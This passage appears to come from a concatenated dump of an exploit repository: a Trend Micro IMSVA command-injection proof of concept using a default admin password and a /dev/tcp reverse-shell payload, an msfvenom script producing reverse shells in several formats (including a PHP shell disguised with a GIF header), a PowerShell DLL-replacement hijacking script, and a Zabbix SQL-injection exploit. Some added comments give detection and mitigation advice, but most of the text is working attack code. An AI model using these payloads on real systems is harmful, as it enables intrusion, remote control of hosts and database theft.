      'sys_desname' => payl,
      'sys_hostname' => 'trend.me',
      'sys_ipv4_gateway' => '192.168.56.1',
      'sys_ipv4_pri_dns' => '192.168.56.1',
      'sys_ipv4_sec_dns' => '',
      'sys_tz_cont' => 'America',
      'sys_tz_regn' => 'United+States',
      'sys_tz_city' => 'New_York',
    }
  })
  print_status("Payload finished.")
end
147 |
148 | end
149 |
--------------------------------------------------------------------------------
/trendmicr00t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # poc based on http://code610.blogspot.com/2017/08/metasploit-module-for-rce-in-trend.html
3 | # 25.08.2018
4 | #
5 | import requests, sys
6 | from urllib import urlencode
7 | import os
8 |
# Python 2 PoC (print statements, str.encode('base64')) for the authenticated
# command injection in the IMSVA WizardSetting_sys.imss LAN-settings form:
#   1. log in with the appliance's default admin credential,
#   2. GET the wizard page so the server-side session records it as visited,
#   3. POST the form with a shell metacharacter string in sys_desname.
# Every host, port and credential below is hard-coded to the author's lab.
target = 'https://192.168.56.34:8445'
print '[+] target:', target

# remember to set nc -lvvp 4444 on 2nd terminal

s = requests.Session()
# Disables TLS certificate validation for every request on this session
# (the appliance presumably presents a self-signed certificate). This also
# leaves the PoC's own traffic, credentials included, open to interception.
s.verify=False

login_url = target + '/login.imss'
login_data = {
    'userid':'admin',
    # The form expects the password base64-encoded (an encoding, not a
    # protection). Python 2's base64 codec appends a trailing newline to the
    # value; the server evidently tolerates it.
    'pwdfake':'imsva'.encode('base64')
}

resp = s.post(login_url, data=login_data)

#token_place = resp.text.find(';jsessionid=') + 13
#token = resp.text[token_place:token_place + 32]


# Assumes the login answered with a redirect that set JSESSIONID on the first
# hop; with no redirect, resp.history is empty and this raises IndexError
# (the Metasploit module checks for the 302 explicitly instead).
auth_cookie = resp.history[0].cookies.get('JSESSIONID')
print '[+] logged-in cookie:', auth_cookie
#print resp.text


# Priming request: the wizard page has to be visited before it is submitted.
myreq = s.get(target + '/WizardSetting_sys.imss?direct=next')
testresp = myreq.text  # unused; the response body is never inspected

print '[+] test GET:',myreq.status_code

#
# The session cookie is passed explicitly even though the Session object
# already carries it; the Referer mimics the wizard's previous page.
cookies = {'JSESSIONID': auth_cookie}
headers = {'Referer':'https://192.168.56.34:8445/WizardSetting_0.imss?direct=next' }
#payload = "AA'; bash -i >& /dev/tcp/192.168.56.106/4444 0>&1 ;#"
# Injected value for sys_desname: the leading quote terminates the quoted
# argument in the server-side command and '#' discards the rest of the line;
# the listener host/port in between are hard-coded.
# Detection/mitigation: quote or semicolon characters in sys_desname are never
# legitimate input for this form - reject them server-side (allow-list the
# field) and alert on unexpected outbound TCP from the appliance.
payload = "AA'; 0<&196;exec 196<>/dev/tcp/192.168.56.106/4444; sh <&196 >&196 2>&196 ;#"
myreq_data = {
    'time_distance' : '0',
    # Real LAN settings are posted alongside the injected field; if the
    # appliance applies them, a run also reconfigures the target's interface.
    'sys_ipv4_addr_eth0' : '192.168.56.34',
    'sys_ipv4_mask_eth0' : '255.255.255.0',
    'sys_desname': payload ,
    'sys_hostname' : 'trend.me',
    'sys_ipv4_gateway' : '192.168.56.1',
    'sys_ipv4_pri_dns' : '192.168.56.1',
    'sys_ipv4_sec_dns' : '',
    'sys_tz_cont' : 'America',
    # requests form-encodes the literal '+' as %2B, so the server should
    # receive 'United+States' verbatim rather than a space.
    'sys_tz_regn' : 'United+States',
    'sys_tz_city' : 'New_York',

}
#myreq_data = urlencode(myreq_data)

myreq = s.post(target + '/WizardSetting_sys.imss?direct=next', data=myreq_data, headers=headers, cookies=cookies) # ,allow_redirects=True)

# Echoes the whole form, injected value included, to stdout; the response
# itself is not checked, so success is only observable on the listener side.
print myreq_data
#print myreq.text
64 |
--------------------------------------------------------------------------------
/upgweb-elf-foscam.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/upgweb-elf-foscam.zip
--------------------------------------------------------------------------------
/venome.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | # venome.sh -- script to generate win/lin revshell to 'my Kali box'
4 | # based on MSF Venom (default install on Kali 2)
5 | #
6 |
7 | # 14.08.2018 @ 19:12
8 |
9 | # some defines first
# Listener address/port used for the generated connect-back payloads. Only
# case 1 below reads these variables; cases 2-6 repeat the same values as
# literals, so a change here is not picked up by them.
KALI=192.168.1.183
KALIPORT=4444
# Set but never used anywhere in the script.
FTYPOUT="py"

####

echo ""
echo "[+] \$\$\$ sh0w m3 th3 m0n3y \$\$\$"
echo ""

# Menu text says (1/2/3) but six options are offered.
echo " >> choose your destiny (1/2/3):"
echo " 1. goto windows 2. goto linux"
echo " 3. php 4. war (jsp)"
echo " 5. dll 6. nodejs"
echo ""
read letsgoto

# Each branch writes one artifact into the current directory. Note the
# redirection order: '> file 2>&1' sends msfvenom's status messages (which it
# prints on stderr) into the artifact as well as the payload itself, so the
# generated files may need the leading status lines stripped.
# Defender note: these are stock msfvenom templates (reverse_tcp,
# shikata_ga_nai); they are well covered by AV/EDR signatures and are
# useful mainly as known-bad samples for testing detection.
case "$letsgoto" in
"1") echo "[+] preparing Windows revshell for Kali ($KALI on port $KALIPORT):"
# The bad-character list is passed in double quotes; sh leaves the
# backslash escapes untouched, which is the form msfvenom expects.
msfvenom -p windows/shell_reverse_tcp LHOST=$KALI LPORT=$KALIPORT EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a" > winshell.py 2>&1
echo "[+] Windows reverse shell should be ready here:"
ls -la winshell.py
echo "[+] we're done."

;;


"2") echo "[+] preparing Linux revshell for Kali ($KALI on port $KALIPORT):"
# LHOST/LPORT are literals here (the banner above still reads $KALI/$KALIPORT).
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.183 LPORT=4444 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a" > linshell.py 2>&1
echo "[+] Linux reverse shell should be ready here:"
ls -la linshell.py
echo "[+] we're done."

;;


"3") echo "[+] preparing PHP revshell for Kali ($KALI on port $KALIPORT):"

# '>>' appends: a leftover phpshell-a.php from an interrupted run would be
# prepended to this output (it is only removed further down on success).
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.183 LPORT=4444 -f raw >> phpshell-a.php 2>&1
# Prefix a fake image magic, then keep only the last two lines of the raw
# output (the rest is presumably the status text captured via 2>&1).
echo "GIF98" > phpshell.php
tail -n 2 phpshell-a.php >> phpshell.php
echo "[+] PHP reverse shell should be ready here:"
rm phpshell-a.php
ls -la phpshell.php
echo "[+] we're done."

;;


"4") echo "[+] preparing WAR (with JSP) revshell for Kali ($KALI on port $KALIPORT):"

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.183 LPORT=4444 -f raw > jspshell.war 2>&1
echo "[+] WAR (JSP) reverse shell should be ready here:"
ls -la jspshell.war
echo "[+] we're done."

;;

"5") echo "[+] preparing DLL revshell for Kali ($KALI on port $KALIPORT):"

# h00ker.dll is the artifact wh0care.ps1 later copies over a writable DLL.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.183 LPORT=4444 -f dll > h00ker.dll 2>&1
echo "[+] DLL reverse shell should be ready here:"
ls -la h00ker.dll
echo "[+] we're done."
;;

"6") echo "[+] preparing NodeJS revshell for Kali ($KALI on port $KALIPORT):"

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.183 LPORT=4444 -f raw > naughty.js 2>&1
echo "[+] naughty.js reverse shell should be ready here:"
ls -la naughty.js
echo "[+] we're done."


;;


# Anything else (including an empty answer) falls through here.
*) echo "[-] nononono! :<"
echo ""

esac # newton

echo "[+] thank you, bye!"
# o/
94 |
--------------------------------------------------------------------------------
/vlc-2.2.4-pocs-01.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/vlc-2.2.4-pocs-01.zip
--------------------------------------------------------------------------------
/vlc-304-probably02-0x918f89cc.0x918f89cc.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/vlc-304-probably02-0x918f89cc.0x918f89cc.zip
--------------------------------------------------------------------------------
/vlc-304-probablynot01-0xada66f78.0xd23faa61.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/vlc-304-probablynot01-0xada66f78.0xd23faa61.zip
--------------------------------------------------------------------------------
/wh0care.ps1:
--------------------------------------------------------------------------------
1 | # -------------------------------------------------------------------------------
2 | #
3 | # wh0care.ps1 -- small Powershell script to automate our 'simple DLL injections'
4 | #
5 | # refs: https://code610.blogspot.com/2018/09/dll-injection-part-1.html
6 | # https://code610.blogspot.com/2018/08/venomesh-simple-msfvenom-generator.html
7 | #
8 | # 09.09.2018
9 | #
10 | # -------------------------------------------------------------------------------
11 |
12 | # defines:
# param() must stay the first statement of the script; $targetDir is the
# directory whose DLLs are inspected for weak permissions.
param([string]$targetDir) # to set argv[1] as our 'targetDir'
# Backslash is not an escape character in PowerShell strings, so these paths
# literally contain doubled separators; Windows path handling generally
# tolerates that, but the literal form is worth confirming if a copy fails.
$evilDll="c:\\Pliki\\h00ker.dll"
$logMeHere="C:\\Pliki\\oko1.log"

# Get perms recursively from target path and save it to log1.file:
# (every file and directory under $targetDir, one ACL listing each)
#
Write-Host "[+] Checking perms for target dir: " $targetDir
Get-ChildItem -Recurse $targetDir | Get-Acl > $logMeHere
Write-Host "[+] Done. Checking files..."

# grep "Modif" for our log1.file;
# save the output to $tmpvar;
# grep it again to get splitted filename.dll:
#
# Both -Pattern values are regular expressions: in ".dll" the dot matches any
# character (so "xdll" would match too), and "Modif" presumably matches a
# "Modify" entry in the ACL's rights text, i.e. lines where some principal may
# write the file.
$tmpvar=(Get-Content $logMeHere ) | Select-String -Pattern ".dll" | Select-String -Pattern "Modif"
# Splits the matching lines on spaces and keeps the tokens containing ".dll".
# This may yield zero or several MatchInfo objects; when several are
# interpolated into a path below they are joined with spaces - TODO confirm
# the single-match case is the only one that works.
$trydll=($tmpvar -Split(" ") | select-string -pattern ".dll")
Write-Host "[+] Got filename:" $trydll


# now we can replace targetDll with our super evil.dll
#
Write-Host "[+] ...but trying evil 0ne: " $evilDll
#
# Rename
Write-Host "[+] Here we go: " $targetDir\$trydll
# Overwrites the located DLL in place. This only succeeds because the ACL
# grants Modify on a DLL the application loads; that permission is the actual
# finding. Mitigation: remove write rights for non-admin principals on
# application directories, and monitor for DLL writes under them.
Copy-Item $evilDll -Destination $targetDir\$trydll

write-host "[+] Dest app should be ready to restart. Check it!"

# eof
# o/
44 |
45 |
--------------------------------------------------------------------------------
/windbg.script.txt:
--------------------------------------------------------------------------------
$$ Crash-triage script: open a log, run the target until it stops, record
$$ registers and a dump, then restart the debuggee for the next iteration.
.echo ""
$$ /t appends the date and time to the log file name, so each run keeps its own log.
.logopen /t c:\target.log
.echo "loaded"
$$ Resume three times - presumably past the initial break and first-chance
$$ exceptions before the stop of interest. The count looks empirical.
g
g
g
$$ Register snapshot at the stop.
r
$$ /u appends date, time and PID to the dump file name (no overwrite between runs).
.dump /u c:\target.dmp
.echo "finished"
.logclose
$$ Restart the debuggee. Confirm the /f flag semantics against the WinDbg reference.
.restart /f
--------------------------------------------------------------------------------
/zabbisql.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # CVE-2016-10134
3 |
4 | import requests
5 | import re
6 | import sys
7 |
# Python 2 SQL-injection check for CVE-2016-10134 (Zabbix latest.php,
# toggle_ids[] parameter). Flow: fetch the dashboard and scrape a session id
# out of its HTML, then send an error-based payload through toggle_ids[] and
# read the database version back out of the error message.
target = sys.argv[1]  # base URL including scheme; no argument validation
dashboard = '/zabbix/dashboard.php'
latest = '/zabbix/latest.php'

print '[+] checking target:', target

sess = requests.Session()
# TLS certificate validation is disabled for both requests in this script.
resp = sess.get(target+dashboard, verify=False)

# Only reports the problem; execution continues, so a missing sid surfaces
# later as an AttributeError on gotsid.group(1) rather than a clean exit.
if not 'sid=' in resp.text:
    print '[-] sid not found ;[ -- break'

# The sid is scraped from a "reconnect=1&sid=..." link in the dashboard HTML,
# which presumably means the target serves the dashboard without a login
# (guest access) - TODO confirm.
gotsid = re.search('reconnect=1&sid=(.*?)"', resp.text)
if gotsid:
    print '[+] gotsid: ', gotsid.group(1)

# payload = '6666+or+updatexml(1,concat(0x23,(select+user()),0x23),1)+or+1=1)%23'
# Error-based payload: updatexml() is made to fail with the query result
# wrapped in '#' markers, and the failing SQL error is echoed in the response.
# Detection/mitigation: 'updatexml(' or 'concat(' inside toggle_ids[] on
# latest.php is never legitimate input - block or alert on it, and fix the
# server side by binding the parameter rather than interpolating it.
payload = '6666 or updatexml(1,concat(0x23,(select version()),0x23),1) or 1=1)#'
params = {
    'output': 'ajax',
    'sid': gotsid.group(1),
    'favobj': 'toggle',
    'toggle_open_state': 1,  # requests stringifies the int in the query string
    'toggle_ids[]': payload
}

# The payload travels in the query string, so it is visible in web server
# access logs and to any proxy/WAF in front of the application.
execsqli = sess.get(target + latest, params=params, verify=False)
#print '[+] response:\n', execsqli.text
checkresp = execsqli.text.splitlines()
for l in checkresp:
    # Compiled once per line; hoisting it out of the loop would be cheaper.
    # Matches the text between the '#' markers inside the echoed SQL error.
    ifanswer = re.compile('error: \'#(.*?)#\']<')
    gotanswer = re.search(ifanswer, l)

    if gotanswer:
        print '[+] Resp: version(): %s' % ( gotanswer.group(1) )

# more: code610.blogspot.com
--------------------------------------------------------------------------------
/zenload4patreons.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/zenload4patreons.zip
--------------------------------------------------------------------------------
|